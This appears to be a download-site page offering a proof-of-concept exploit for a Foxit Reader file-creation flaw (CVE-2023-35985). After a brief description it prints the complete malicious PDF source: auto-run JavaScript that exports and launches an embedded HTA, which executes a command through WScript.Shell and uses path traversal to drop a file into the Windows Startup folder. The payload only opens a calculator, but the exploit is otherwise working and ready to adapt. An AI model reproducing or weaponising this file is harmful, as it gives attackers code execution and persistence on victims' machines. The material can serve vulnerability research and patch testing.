Foxit Reader CVE-2023-35985 POC

Foxit Reader CVE-2023-35985 POC

vPdf by Prapattimynk

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted mal

Android Android 5.0Exploits And POCs
( 861 ratings )
Price: $0
File Foxit Reader CVE-2023-35985 POC
Publisher Prapattimynk
Genre Exploits And POCs
Size -
File Type Pdf
Os All
Mod Version Pdf
Report Report
Foxit Reader CVE-2023-35985 POC is the most famous version in the Foxit Reader CVE-2023-35985 POC series of publisher
Download

An arbitrary file creation vulnerability exists in the Javascript exportDataObject API of Foxit Reader 12.1.3.15356 due to a failure to properly validate a dangerous extension. A specially crafted malicious file can create files at arbitrary locations, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted malicious site if the browser plugin extension is enabled.

%PDF 
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>> 

2 0 obj
<</S/JavaScript/JS(
	function main() {
		console.show();
		this.exportDataObject({ cName:"MyData", nLaunch: 2});
	}
	main();
)/Type/Action>>
endobj

3 0 obj
<<
	/Length 6
	/Params
	<</ModDate(D:20230731134730-08'00')
	/Size 6
	/CheckSum<FA0903293EC8FC1F19087D0EB2FFDED8>
	/CreationDate(D:20230731133537-08'00')
>>
	/Subtype/application#2Fhta/Type/EmbeddedFile>>
stream
	<script language='jscript'>var cmd = 'cmd.exe /c calc.exe'; new ActiveXObject('WScript.Shell').Run(cmd);</script>
endstream
endobj
	
4 0 obj
<<
	/UF(..\/..\/..\/..\/..\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/exploit.htm)/EF
	<</F 3 0 R>>/Desc()/F(exploit.hta)/Type/Filespec>>
endobj

5 0 obj
	<</EmbeddedFiles 6 0 R>>
endobj

6 0 obj
	<</Names[<FEFF004D00790044006100740061>4 0 R]>>
endobj
)>> trailer <</Root 1 0 R>>


Recommended for You

You may also like

Comments

Your email address will not be published. Required fields are marked *

Next Post X
Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.